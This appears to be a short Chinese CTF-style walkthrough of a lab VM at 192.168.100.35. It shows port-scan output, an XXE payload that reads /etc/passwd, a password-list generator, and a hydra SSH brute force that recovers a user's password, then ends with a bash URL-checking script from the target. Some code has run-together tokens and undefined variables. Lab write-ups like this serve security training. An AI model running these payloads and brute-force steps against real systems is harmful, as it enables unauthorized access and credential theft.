[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.35:22 Open 192.168.100.35:80 [~] Starting Script(s) [~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 12:30 CST Initiating ARP Ping Scan at 12:30 Scanning 192.168.100.35 [1 port] Completed ARP Ping Scan at 12:30, 0.04s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 12:30 Completed Parallel DNS resolution of 1 host. at 12:30, 13.00s elapsed DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 2, OK: 0, NX: 0, DR: 1, SF: 0, TR: 4, CN: 0] Initiating SYN Stealth Scan at 12:30 Scanning 192.168.100.35 [2 ports] Discovered open port 22/tcp on 192.168.100.35 Discovered open port 80/tcp on 192.168.100.35 Completed SYN Stealth Scan at 12:30, 0.01s elapsed (2 total ports) Nmap scan report for 192.168.100.35 Host is up, received arp-response (0.00050s latency). Scanned at 2026-01-17 12:30:47 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:C1:42:66 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
80/tcp
是一个xml输入框
1 2 3 4 5 6
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY spSYSTEM"file:///etc/passwd"> ]> <r>&sp;</r>
# 生成所有候选密码并写入文件(每行一个密码) withopen("password_dict.txt", "w", encoding="utf-8") as f: for c1 in charset: for c2 in charset: # 生成完整候选密码 candidate_pwd = password_template.format(c1, c2) f.write(candidate_pwd + "\n")
root@LAPTOP-O235O5EH [~/Desktop] ➜ hydra -l tuf -P password_dict.txt -t 4 192.168.100.35 ssh [12:33:35] Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-17 12:33:53 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 4 tasks per 1 server, overall 4 tasks, 3845 login tries (l:1/p:3845), ~962 tries per task [DATA] attacking ssh://192.168.100.35:22/ [22][ssh] host: 192.168.100.35 login: tuf password: KQNPHFqG6mJHcYJossIe 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-17 12:34:06
#!/bin/bash input_url="" output_file="" use_file=false regex='^https://maze-sec.com/[a-zA-Z0-9/]*$' whilegetopts":u:o:" opt; do case${opt}in u) input_url="$OPTARG" ;; o) output_file="$OPTARG"; use_file=true ;; \?) echo"错误: 无效选项 -$OPTARG"; exit 1 ;; :) echo"错误: 选项 -$OPTARG 需要一个参数"; exit 1 ;; esac done if [[ -z "$input_url" ]]; then echo"错误: 必须使用 -u 参数提供URL" exit 1 fi if [[ ! "$input_url" =~ ^https://maze-sec.com/ ]]; then echo"错误: URL必须以 https://maze-sec.com/ 开头" exit 1 fi if [[ ! "$input_url" =~ $regex ]]; then echo"错误: URL包含非法字符,只允许字母、数字和斜杠" exit 1 fi if (( RANDOM % 2 )); then result="$input_url is a good url." else result="$input_url is not a good url." fi if [ "$use_file" = true ]; then echo"$result" > "$output_file" echo"结果已保存到: $output_file" else echo"$result" fi